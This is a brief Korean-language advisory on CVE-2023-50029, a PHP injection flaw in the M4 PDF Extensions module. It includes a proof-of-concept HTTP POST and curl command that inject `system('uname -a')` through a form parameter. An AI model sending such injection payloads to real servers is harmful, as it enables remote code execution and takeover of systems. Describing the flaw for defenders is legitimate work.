
CVE-2023-50029: M4 PDF Extensions Module의 PHP 주입 취약점
CVE-2023-50029는 M4 PDF Extensions 모듈의 PHP 인젝션 취약점입니다. 이 취약점으로 인해 공격자는 서버에 임의의 PHP 코드를 주입 및 실행할 수 있으며, 이를 통해 대상 시스템에 대한 완전한 제어권을 획득할 수 있습니다. 문제는 입력값의 부적절한 검증에 있으며, 악성 코드가 사용자 파라미터를 통해 전달될 수 있습니다.
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
pdf_content=<?php system('uname -a'); ?>
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"